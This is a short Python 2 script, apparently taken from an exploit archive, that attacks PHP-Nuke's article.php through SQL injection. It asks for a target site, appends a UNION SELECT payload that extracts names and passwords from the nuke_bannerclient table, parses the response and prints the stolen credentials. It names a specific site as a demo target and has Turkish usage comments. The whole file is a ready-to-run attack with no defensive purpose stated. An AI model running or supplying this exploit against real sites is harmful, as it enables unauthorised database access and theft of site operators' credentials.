PHP-Nuke article.php remote SQL injection exploit.
0a7ea9f131c8dbbb18ddb7e878f65510897154a2f2d43afddee2847e6e381251
# Coded By : darkTR - CodeHunters
#https://www.1337day.com/exploits/16550
#Demo : https://www.moravanszky.com/article.php?sid=24
#Site adresini açýklý kýsým olarak girin www.site.com/article.php?sid=24 þeklinde
import re, time, urllib2
hedef = raw_input("Site adiniz giriniz:")
sorgu = "+union+select+1,2,3,4,5,concat(0x3a3a3a,name,0x3a3a3a,passwd,0x3a3a3a),7,8,9+from+nuke_bannerclient"
okunacak_adres = hedef+sorgu
okunan = urllib2.urlopen(okunacak_adres).read()
arama = re.search("(.*):::(.*:::.*):::(.*)",okunan)
if arama:
son = arama.group(2)
user = son.split(":::")[0]
password = son.split(":::")[1]
print "user:" + user
print "password" + password